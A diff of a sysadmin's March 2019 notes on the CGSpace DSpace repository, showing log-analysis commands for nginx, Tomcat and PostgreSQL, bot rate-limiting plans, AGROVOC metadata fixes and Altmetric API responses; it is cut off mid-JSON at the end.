<li>Maybe I need to re-evaluate the &ldquo;defauts&rdquo; of Tomcat 7&rsquo;s DBCP and set them explicitly in our config</li>
<li>From Tomcat 8 they seem to default to Apache Commons' DBCP 2.x</li>
<li>From Tomcat 8 they seem to default to Apache Commons&rsquo; DBCP 2.x</li>
</ul>
</li>
<li>Also, CGSpace doesn&rsquo;t have many Cocoon errors yet this morning:</li>
</ul>
<pre><code>$ grep 'Can not load requested doc' cocoon.log.2019-03-25 | grep -oE '2019-03-25 [0-9]{2}:' | sort | uniq -c
<pre tabindex="0"><code>$ grep &#39;Can not load requested doc&#39; cocoon.log.2019-03-25 | grep -oE &#39;2019-03-25 [0-9]{2}:&#39; | sort | uniq -c
4 2019-03-25 00:
1 2019-03-25 01:
</code></pre><ul>
@ -869,7 +869,7 @@ org.postgresql.util.PSQLException: This statement has been closed.
<li>Uptime Robot reported that CGSpace went down and I see the load is very high</li>
<li>The top IPs around the time in the nginx API and web logs were:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;25/Mar/2019:(18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;25/Mar/2019:(18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
9 190.252.43.162
12 157.55.39.140
18 157.55.39.54
@ -880,7 +880,7 @@ org.postgresql.util.PSQLException: This statement has been closed.
36 157.55.39.9
50 52.23.239.229
2380 45.5.186.2
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;25/Mar/2019:(18|19|20|21)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;25/Mar/2019:(18|19|20|21)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
354 18.195.78.144
363 190.216.179.100
386 40.77.167.185
@ -894,27 +894,27 @@ org.postgresql.util.PSQLException: This statement has been closed.
</code></pre><ul>
<li>The IPs look pretty normal except we&rsquo;ve never seen <code>93.179.69.74</code> before, and it uses the following user agent:</li>
</ul>
<pre><code>Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1
<pre tabindex="0"><code>Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.20 Safari/535.1
</code></pre><ul>
<li>Surprisingly they are re-using their Tomcat session:</li>
</ul>
<pre><code>$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=93.179.69.74' dspace.log.2019-03-25 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=93.179.69.74&#39; dspace.log.2019-03-25 | sort | uniq | wc -l
1
</code></pre><ul>
<li>That&rsquo;s weird because the total number of sessions today seems low compared to recent days:</li>
</ul>
<pre><code>$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-25 | sort -u | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-25 | sort -u | wc -l
5657
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-24 | sort -u | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-24 | sort -u | wc -l
17710
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-23 | sort -u | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-23 | sort -u | wc -l
17179
$ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
$ grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; dspace.log.2019-03-22 | sort -u | wc -l
7904
</code></pre><ul>
<li>PostgreSQL seems to be pretty busy:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
11 dspaceApi
10 dspaceCli
67 dspaceWeb
@ -931,7 +931,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
<li>UptimeRobot says CGSpace went down again and I see the load is again at 14.0!</li>
<li>Here are the top IPs in nginx logs in the last hour:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;26/Mar/2019:(06|07)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;26/Mar/2019:(06|07)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
3 35.174.184.209
3 66.249.66.81
4 104.198.9.108
@ -942,7 +942,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
414 45.5.184.72
535 45.5.186.2
2014 205.186.128.185
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;26/Mar/2019:(06|07)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;26/Mar/2019:(06|07)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
157 41.204.190.40
160 18.194.46.84
160 54.70.40.11
@ -960,7 +960,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
<li>I will add these three to the &ldquo;bad bot&rdquo; rate limiting that I originally used for Baidu</li>
<li>Going further, these are the IPs making requests to Discovery and Browse pages so far today:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;(discover|browse)&quot; | grep -E &quot;26/Mar/2019:&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;(discover|browse)&#34; | grep -E &#34;26/Mar/2019:&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
120 34.207.146.166
128 3.91.79.74
132 108.179.57.67
@ -978,7 +978,7 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
<li>I can only hope that this helps the load go down because all this traffic is disrupting the service for normal users and well-behaved bots (and interrupting my dinner and breakfast)</li>
<li>Looking at the database usage I&rsquo;m wondering why there are so many connections from the DSpace CLI:</li>
</ul>
<pre><code>$ psql -c 'select * from pg_stat_activity' | grep -o -E '(dspaceWeb|dspaceApi|dspaceCli)' | sort | uniq -c
<pre tabindex="0"><code>$ psql -c &#39;select * from pg_stat_activity&#39; | grep -o -E &#39;(dspaceWeb|dspaceApi|dspaceCli)&#39; | sort | uniq -c
5 dspaceApi
10 dspaceCli
13 dspaceWeb
@ -987,19 +987,19 @@ $ grep -o -E 'session_id=[A-Z0-9]{32}' dspace.log.2019-03-22 | sort -u | wc -l
<li>Make a minor edit to my <code>agrovoc-lookup.py</code> script to match subject terms with parentheses like <code>COCOA (PLANT)</code></li>
<li>Test 89 corrections and 79 deletions for AGROVOC subject terms from the ones I cleaned up in the last week</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/2019-03-26-AGROVOC-89-corrections.csv -db dspace -u dspace -p 'fuuu' -f dc.subject -m 57 -t correct -d -n
$ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db dspace -u dspace -p 'fuuu' -m 57 -f dc.subject -d -n
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-03-26-AGROVOC-89-corrections.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.subject -m 57 -t correct -d -n
$ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 57 -f dc.subject -d -n
</code></pre><ul>
<li>UptimeRobot says CGSpace is down again, but it seems to just be slow, as the load is over 10.0</li>
<li>Looking at the nginx logs I don&rsquo;t see anything terribly abusive, but SemrushBot has made ~3,000 requests to Discovery and Browse pages today:</li>
</ul>
<pre><code># grep SemrushBot /var/log/nginx/access.log | grep -E &quot;26/Mar/2019&quot; | grep -E '(discover|browse)' | wc -l
<pre tabindex="0"><code># grep SemrushBot /var/log/nginx/access.log | grep -E &#34;26/Mar/2019&#34; | grep -E &#39;(discover|browse)&#39; | wc -l
2931
</code></pre><ul>
<li>So I&rsquo;m adding it to the badbot rate limiting in nginx, and actually, I kinda feel like just blocking all user agents with &ldquo;bot&rdquo; in the name for a few days to see if things calm down&hellip; maybe not just yet</li>
<li>Otherwise, these are the top users in the web and API logs the last hour (1819):</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &quot;26/Mar/2019:(18|19)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep -E &#34;26/Mar/2019:(18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
54 41.216.228.158
65 199.47.87.140
75 157.55.39.238
@ -1010,7 +1010,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
277 2a01:4f8:13b:1296::2
291 66.249.66.80
328 35.174.184.209
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &quot;26/Mar/2019:(18|19)&quot; | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/{oai,rest,statistics}.log /var/log/nginx/{oai,rest,statistics}.log.1 | grep -E &#34;26/Mar/2019:(18|19)&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
2 2409:4066:211:2caf:3c31:3fae:2212:19cc
2 35.10.204.140
2 45.251.231.45
@ -1025,7 +1025,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
<li>For the XMLUI I see <code>18.195.78.144</code> and <code>18.196.196.108</code> requesting only CTA items and with no user agent</li>
<li>They are responsible for almost 1,000 XMLUI sessions today:</li>
</ul>
<pre><code>$ grep -o -E 'session_id=[A-Z0-9]{32}:ip_addr=(18.195.78.144|18.196.196.108)' dspace.log.2019-03-26 | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep -o -E &#39;session_id=[A-Z0-9]{32}:ip_addr=(18.195.78.144|18.196.196.108)&#39; dspace.log.2019-03-26 | sort | uniq | wc -l
937
</code></pre><ul>
<li>I will add their IPs to the list of bot IPs in nginx so I can tag them as bots to let Tomcat&rsquo;s Crawler Session Manager Valve to force them to re-use their session</li>
@ -1033,19 +1033,19 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
<li>I will add curl to the Tomcat Crawler Session Manager because anyone using curl is most likely an automated read-only request</li>
<li>I will add GuzzleHttp to the nginx badbots rate limiting, because it is making requests to dynamic Discovery pages</li>
</ul>
<pre><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep 45.5.184.72 | grep -E &quot;26/Mar/2019:&quot; | grep -E '(discover|browse)' | wc -l
<pre tabindex="0"><code># zcat --force /var/log/nginx/{access,error,library-access}.log /var/log/nginx/{access,error,library-access}.log.1 | grep 45.5.184.72 | grep -E &#34;26/Mar/2019:&#34; | grep -E &#39;(discover|browse)&#39; | wc -l
119
</code></pre><ul>
<li>What&rsquo;s strange is that I can&rsquo;t see any of their requests in the DSpace log&hellip;</li>
</ul>
<pre><code>$ grep -I -c 45.5.184.72 dspace.log.2019-03-26
<pre tabindex="0"><code>$ grep -I -c 45.5.184.72 dspace.log.2019-03-26
0
</code></pre><h2 id="2019-03-28">2019-03-28</h2>
<ul>
<li>Run the corrections and deletions to AGROVOC (dc.subject) on DSpace Test and CGSpace, and then start a full re-index of Discovery</li>
<li>What the hell is going on with this CTA publication?</li>
</ul>
<pre><code># grep Spore-192-EN-web.pdf /var/log/nginx/access.log | awk '{print $1}' | sort | uniq -c | sort -n
<pre tabindex="0"><code># grep Spore-192-EN-web.pdf /var/log/nginx/access.log | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n
1 37.48.65.147
1 80.113.172.162
2 108.174.5.117
@ -1077,7 +1077,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
</li>
<li>In other news, I see that it&rsquo;s not even the end of the month yet and we have 3.6 million hits already:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Mar/2019&quot;
<pre tabindex="0"><code># zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Mar/2019&#34;
3654911
</code></pre><ul>
<li>In other other news I see that DSpace has no statistics for years before 2019 currently, yet when I connect to Solr I see all the cores up</li>
@ -1105,7 +1105,7 @@ $ ./delete-metadata-values.py -i /tmp/2019-03-26-AGROVOC-79-deletions.csv -db ds
<li>It is frustrating to see that the load spikes for own own legitimate load on the server were <em>very</em> aggravated and drawn out by the contention for CPU on this host</li>
<li>We had 4.2 million hits this month according to the web server logs:</li>
</ul>
<pre><code># time zcat --force /var/log/nginx/* | grep -cE &quot;[0-9]{1,2}/Mar/2019&quot;
<pre tabindex="0"><code># time zcat --force /var/log/nginx/* | grep -cE &#34;[0-9]{1,2}/Mar/2019&#34;
4218841
real 0m26.609s
@ -1114,7 +1114,7 @@ sys 0m2.551s
</code></pre><ul>
<li>Interestingly, now that the CPU steal is not an issue the REST API is ten seconds faster than it was in <a href="/cgspace-notes/2018-10/">2018-10</a>:</li>
</ul>
<pre><code>$ time http --print h 'https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0'
<pre tabindex="0"><code>$ time http --print h &#39;https://cgspace.cgiar.org/rest/items?expand=metadata,bitstreams,parentCommunityList&amp;limit=100&amp;offset=0&#39;
...
0.33s user 0.07s system 2% cpu 17.167 total
0.27s user 0.04s system 1% cpu 16.643 total
@ -1137,7 +1137,7 @@ sys 0m2.551s
<li>Looking at the weird issue with shitloads of downloads on the <a href="https://cgspace.cgiar.org/handle/10568/100289">CTA item</a> again</li>
<li>The item was added on 2019-03-13 and these three IPs have attempted to download the item&rsquo;s bitstream 43,000 times since it was added eighteen days ago:</li>
</ul>
<pre><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.{2..17}.gz | grep 'Spore-192-EN-web.pdf' | awk '{print $1}' | sort | uniq -c | sort -n | tail -n 5
<pre tabindex="0"><code># zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/access.log.{2..17}.gz | grep &#39;Spore-192-EN-web.pdf&#39; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 5
42 196.43.180.134
621 185.247.144.227
8102 18.194.46.84
@ -1152,7 +1152,7 @@ sys 0m2.551s
</ul>
</li>
</ul>
<pre><code>2019-03-29 09:10:07,311 ERROR org.dspace.rest.Resource @ Could not delete collection(id=1451), AuthorizeException. Message: org.dspace.authorize.AuthorizeException: Authorization denied for action ADMIN on COLLECTION:1451 by user 9492
<pre tabindex="0"><code>2019-03-29 09:10:07,311 ERROR org.dspace.rest.Resource @ Could not delete collection(id=1451), AuthorizeException. Message: org.dspace.authorize.AuthorizeException: Authorization denied for action ADMIN on COLLECTION:1451 by user 9492
</code></pre><ul>
<li>IWMI people emailed to ask why two items with the same DOI don&rsquo;t have the same Altmetric score:
<ul>
@ -1168,16 +1168,16 @@ sys 0m2.551s
</ul>
</li>
</ul>
<pre><code>_altmetric.embed_callback({&quot;title&quot;:&quot;Distilling the role of ecosystem services in the Sustainable Development Goals&quot;,&quot;doi&quot;:&quot;10.1016/j.ecoser.2017.10.010&quot;,&quot;tq&quot;:[&quot;Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of&quot;,&quot;Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers&quot;,&quot;How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!&quot;,&quot;Excellent paper about the contribution of #ecosystemservices to SDGs&quot;,&quot;So great to work with amazing collaborators&quot;],&quot;altmetric_jid&quot;:&quot;521611533cf058827c00000a&quot;,&quot;issns&quot;:[&quot;2212-0416&quot;],&quot;journal&quot;:&quot;Ecosystem Services&quot;,&quot;cohorts&quot;:{&quot;sci&quot;:58,&quot;pub&quot;:239,&quot;doc&quot;:3,&quot;com&quot;:2},&quot;context&quot;:{&quot;all&quot;:{&quot;count&quot;:12732768,&quot;mean&quot;:7.8220956572788,&quot;rank&quot;:56146,&quot;pct&quot;:99,&quot;higher_than&quot;:12676701},&quot;journal&quot;:{&quot;count&quot;:549,&quot;mean&quot;:7.7567299270073,&quot;rank&quot;:2,&quot;pct&quot;:99,&quot;higher_than&quot;:547},&quot;similar_age_3m&quot;:{&quot;count&quot;:386919,&quot;mean&quot;:11.573702536454,&quot;rank&quot;:3299,&quot;pct&quot;:99,&quot;higher_than&quot;:383619},&quot;similar_age_journal_3m&quot;:{&quot;count&quot;:28,&quot;mean&quot;:9.5648148148148,&quot;rank&quot;:1,&quot;pct&quot;:96,&quot;higher_than&quot;:27}},&quot;authors&quot;:[&quot;Sylvia L.R. Wood&quot;,&quot;Sarah K. Jones&quot;,&quot;Justin A. Johnson&quot;,&quot;Kate A. Brauman&quot;,&quot;Rebecca Chaplin-Kramer&quot;,&quot;Alexander Fremier&quot;,&quot;Evan Girvetz&quot;,&quot;Line J. Gordon&quot;,&quot;Carrie V. Kappel&quot;,&quot;Lisa Mandle&quot;,&quot;Mark Mulligan&quot;,&quot;Patrick O'Farrell&quot;,&quot;William K. Smith&quot;,&quot;Louise Willemen&quot;,&quot;Wei Zhang&quot;,&quot;Fabrice A. DeClerck&quot;],&quot;type&quot;:&quot;article&quot;,&quot;handles&quot;:[&quot;10568/89975&quot;,&quot;10568/89846&quot;],&quot;handle&quot;:&quot;10568/89975&quot;,&quot;altmetric_id&quot;:29816439,&quot;schema&quot;:&quot;1.5.4&quot;,&quot;is_oa&quot;:false,&quot;cited_by_posts_count&quot;:377,&quot;cited_by_tweeters_count&quot;:302,&quot;cited_by_fbwalls_count&quot;:1,&quot;cited_by_gplus_count&quot;:1,&quot;cited_by_policies_count&quot;:2,&quot;cited_by_accounts_count&quot;:306,&quot;last_updated&quot;:1554039125,&quot;score&quot;:208.65,&quot;history&quot;:{&quot;1y&quot;:54.75,&quot;6m&quot;:10.35,&quot;3m&quot;:5.5,&quot;1m&quot;:5.5,&quot;1w&quot;:1.5,&quot;6d&quot;:1.5,&quot;5d&quot;:1.5,&quot;4d&quot;:1.5,&quot;3d&quot;:1.5,&quot;2d&quot;:1,&quot;1d&quot;:1,&quot;at&quot;:208.65},&quot;url&quot;:&quot;http://dx.doi.org/10.1016/j.ecoser.2017.10.010&quot;,&quot;added_on&quot;:1512153726,&quot;published_on&quot;:1517443200,&quot;readers&quot;:{&quot;citeulike&quot;:0,&quot;mendeley&quot;:248,&quot;connotea&quot;:0},&quot;readers_count&quot;:248,&quot;images&quot;:{&quot;small&quot;:&quot;https://badges.altmetric.com/?size=64&amp;score=209&amp;types=tttttfdg&quot;,&quot;medium&quot;:&quot;https://badges.altmetric.com/?size=100&amp;score=209&amp;types=tttttfdg&quot;,&quot;large&quot;:&quot;https://badges.altmetric.com/?size=180&amp;score=209&amp;types=tttttfdg&quot;},&quot;details_url&quot;:&quot;http://www.altmetric.com/details.php?citation_id=29816439&quot;})
<pre tabindex="0"><code>_altmetric.embed_callback({&#34;title&#34;:&#34;Distilling the role of ecosystem services in the Sustainable Development Goals&#34;,&#34;doi&#34;:&#34;10.1016/j.ecoser.2017.10.010&#34;,&#34;tq&#34;:[&#34;Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of&#34;,&#34;Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers&#34;,&#34;How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!&#34;,&#34;Excellent paper about the contribution of #ecosystemservices to SDGs&#34;,&#34;So great to work with amazing collaborators&#34;],&#34;altmetric_jid&#34;:&#34;521611533cf058827c00000a&#34;,&#34;issns&#34;:[&#34;2212-0416&#34;],&#34;journal&#34;:&#34;Ecosystem Services&#34;,&#34;cohorts&#34;:{&#34;sci&#34;:58,&#34;pub&#34;:239,&#34;doc&#34;:3,&#34;com&#34;:2},&#34;context&#34;:{&#34;all&#34;:{&#34;count&#34;:12732768,&#34;mean&#34;:7.8220956572788,&#34;rank&#34;:56146,&#34;pct&#34;:99,&#34;higher_than&#34;:12676701},&#34;journal&#34;:{&#34;count&#34;:549,&#34;mean&#34;:7.7567299270073,&#34;rank&#34;:2,&#34;pct&#34;:99,&#34;higher_than&#34;:547},&#34;similar_age_3m&#34;:{&#34;count&#34;:386919,&#34;mean&#34;:11.573702536454,&#34;rank&#34;:3299,&#34;pct&#34;:99,&#34;higher_than&#34;:383619},&#34;similar_age_journal_3m&#34;:{&#34;count&#34;:28,&#34;mean&#34;:9.5648148148148,&#34;rank&#34;:1,&#34;pct&#34;:96,&#34;higher_than&#34;:27}},&#34;authors&#34;:[&#34;Sylvia L.R. Wood&#34;,&#34;Sarah K. Jones&#34;,&#34;Justin A. Johnson&#34;,&#34;Kate A. Brauman&#34;,&#34;Rebecca Chaplin-Kramer&#34;,&#34;Alexander Fremier&#34;,&#34;Evan Girvetz&#34;,&#34;Line J. Gordon&#34;,&#34;Carrie V. Kappel&#34;,&#34;Lisa Mandle&#34;,&#34;Mark Mulligan&#34;,&#34;Patrick O&#39;Farrell&#34;,&#34;William K. Smith&#34;,&#34;Louise Willemen&#34;,&#34;Wei Zhang&#34;,&#34;Fabrice A. DeClerck&#34;],&#34;type&#34;:&#34;article&#34;,&#34;handles&#34;:[&#34;10568/89975&#34;,&#34;10568/89846&#34;],&#34;handle&#34;:&#34;10568/89975&#34;,&#34;altmetric_id&#34;:29816439,&#34;schema&#34;:&#34;1.5.4&#34;,&#34;is_oa&#34;:false,&#34;cited_by_posts_count&#34;:377,&#34;cited_by_tweeters_count&#34;:302,&#34;cited_by_fbwalls_count&#34;:1,&#34;cited_by_gplus_count&#34;:1,&#34;cited_by_policies_count&#34;:2,&#34;cited_by_accounts_count&#34;:306,&#34;last_updated&#34;:1554039125,&#34;score&#34;:208.65,&#34;history&#34;:{&#34;1y&#34;:54.75,&#34;6m&#34;:10.35,&#34;3m&#34;:5.5,&#34;1m&#34;:5.5,&#34;1w&#34;:1.5,&#34;6d&#34;:1.5,&#34;5d&#34;:1.5,&#34;4d&#34;:1.5,&#34;3d&#34;:1.5,&#34;2d&#34;:1,&#34;1d&#34;:1,&#34;at&#34;:208.65},&#34;url&#34;:&#34;http://dx.doi.org/10.1016/j.ecoser.2017.10.010&#34;,&#34;added_on&#34;:1512153726,&#34;published_on&#34;:1517443200,&#34;readers&#34;:{&#34;citeulike&#34;:0,&#34;mendeley&#34;:248,&#34;connotea&#34;:0},&#34;readers_count&#34;:248,&#34;images&#34;:{&#34;small&#34;:&#34;https://badges.altmetric.com/?size=64&amp;score=209&amp;types=tttttfdg&#34;,&#34;medium&#34;:&#34;https://badges.altmetric.com/?size=100&amp;score=209&amp;types=tttttfdg&#34;,&#34;large&#34;:&#34;https://badges.altmetric.com/?size=180&amp;score=209&amp;types=tttttfdg&#34;},&#34;details_url&#34;:&#34;http://www.altmetric.com/details.php?citation_id=29816439&#34;})
</code></pre><ul>
<li>The response paylod for the second one is the same:</li>
</ul>
<pre><code>_altmetric.embed_callback({&quot;title&quot;:&quot;Distilling the role of ecosystem services in the Sustainable Development Goals&quot;,&quot;doi&quot;:&quot;10.1016/j.ecoser.2017.10.010&quot;,&quot;tq&quot;:[&quot;Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of&quot;,&quot;Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers&quot;,&quot;How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!&quot;,&quot;Excellent paper about the contribution of #ecosystemservices to SDGs&quot;,&quot;So great to work with amazing collaborators&quot;],&quot;altmetric_jid&quot;:&quot;521611533cf058827c00000a&quot;,&quot;issns&quot;:[&quot;2212-0416&quot;],&quot;journal&quot;:&quot;Ecosystem Services&quot;,&quot;cohorts&quot;:{&quot;sci&quot;:58,&quot;pub&quot;:239,&quot;doc&quot;:3,&quot;com&quot;:2},&quot;context&quot;:{&quot;all&quot;:{&quot;count&quot;:12732768,&quot;mean&quot;:7.8220956572788,&quot;rank&quot;:56146,&quot;pct&quot;:99,&quot;higher_than&quot;:12676701},&quot;journal&quot;:{&quot;count&quot;:549,&quot;mean&quot;:7.7567299270073,&quot;rank&quot;:2,&quot;pct&quot;:99,&quot;higher_than&quot;:547},&quot;similar_age_3m&quot;:{&quot;count&quot;:386919,&quot;mean&quot;:11.573702536454,&quot;rank&quot;:3299,&quot;pct&quot;:99,&quot;higher_than&quot;:383619},&quot;similar_age_journal_3m&quot;:{&quot;count&quot;:28,&quot;mean&quot;:9.5648148148148,&quot;rank&quot;:1,&quot;pct&quot;:96,&quot;higher_than&quot;:27}},&quot;authors&quot;:[&quot;Sylvia L.R. Wood&quot;,&quot;Sarah K. Jones&quot;,&quot;Justin A. Johnson&quot;,&quot;Kate A. Brauman&quot;,&quot;Rebecca Chaplin-Kramer&quot;,&quot;Alexander Fremier&quot;,&quot;Evan Girvetz&quot;,&quot;Line J. Gordon&quot;,&quot;Carrie V. Kappel&quot;,&quot;Lisa Mandle&quot;,&quot;Mark Mulligan&quot;,&quot;Patrick O'Farrell&quot;,&quot;William K. Smith&quot;,&quot;Louise Willemen&quot;,&quot;Wei Zhang&quot;,&quot;Fabrice A. DeClerck&quot;],&quot;type&quot;:&quot;article&quot;,&quot;handles&quot;:[&quot;10568/89975&quot;,&quot;10568/89846&quot;],&quot;handle&quot;:&quot;10568/89975&quot;,&quot;altmetric_id&quot;:29816439,&quot;schema&quot;:&quot;1.5.4&quot;,&quot;is_oa&quot;:false,&quot;cited_by_posts_count&quot;:377,&quot;cited_by_tweeters_count&quot;:302,&quot;cited_by_fbwalls_count&quot;:1,&quot;cited_by_gplus_count&quot;:1,&quot;cited_by_policies_count&quot;:2,&quot;cited_by_accounts_count&quot;:306,&quot;last_updated&quot;:1554039125,&quot;score&quot;:208.65,&quot;history&quot;:{&quot;1y&quot;:54.75,&quot;6m&quot;:10.35,&quot;3m&quot;:5.5,&quot;1m&quot;:5.5,&quot;1w&quot;:1.5,&quot;6d&quot;:1.5,&quot;5d&quot;:1.5,&quot;4d&quot;:1.5,&quot;3d&quot;:1.5,&quot;2d&quot;:1,&quot;1d&quot;:1,&quot;at&quot;:208.65},&quot;url&quot;:&quot;http://dx.doi.org/10.1016/j.ecoser.2017.10.010&quot;,&quot;added_on&quot;:1512153726,&quot;published_on&quot;:1517443200,&quot;readers&quot;:{&quot;citeulike&quot;:0,&quot;mendeley&quot;:248,&quot;connotea&quot;:0},&quot;readers_count&quot;:248,&quot;images&quot;:{&quot;small&quot;:&quot;https://badges.altmetric.com/?size=64&amp;score=209&amp;types=tttttfdg&quot;,&quot;medium&quot;:&quot;https://badges.altmetric.com/?size=100&amp;score=209&amp;types=tttttfdg&quot;,&quot;large&quot;:&quot;https://badges.altmetric.com/?size=180&amp;score=209&amp;types=tttttfdg&quot;},&quot;details_url&quot;:&quot;http://www.altmetric.com/details.php?citation_id=29816439&quot;})
<pre tabindex="0"><code>_altmetric.embed_callback({&#34;title&#34;:&#34;Distilling the role of ecosystem services in the Sustainable Development Goals&#34;,&#34;doi&#34;:&#34;10.1016/j.ecoser.2017.10.010&#34;,&#34;tq&#34;:[&#34;Progress on 12 of 17 #SDGs rely on #ecosystemservices - new paper co-authored by a number of&#34;,&#34;Distilling the role of ecosystem services in the Sustainable Development Goals - new paper by @SNAPPartnership researchers&#34;,&#34;How do #ecosystemservices underpin the #SDGs? Our new paper starts counting the ways. Check it out in the link below!&#34;,&#34;Excellent paper about the contribution of #ecosystemservices to SDGs&#34;,&#34;So great to work with amazing collaborators&#34;],&#34;altmetric_jid&#34;:&#34;521611533cf058827c00000a&#34;,&#34;issns&#34;:[&#34;2212-0416&#34;],&#34;journal&#34;:&#34;Ecosystem 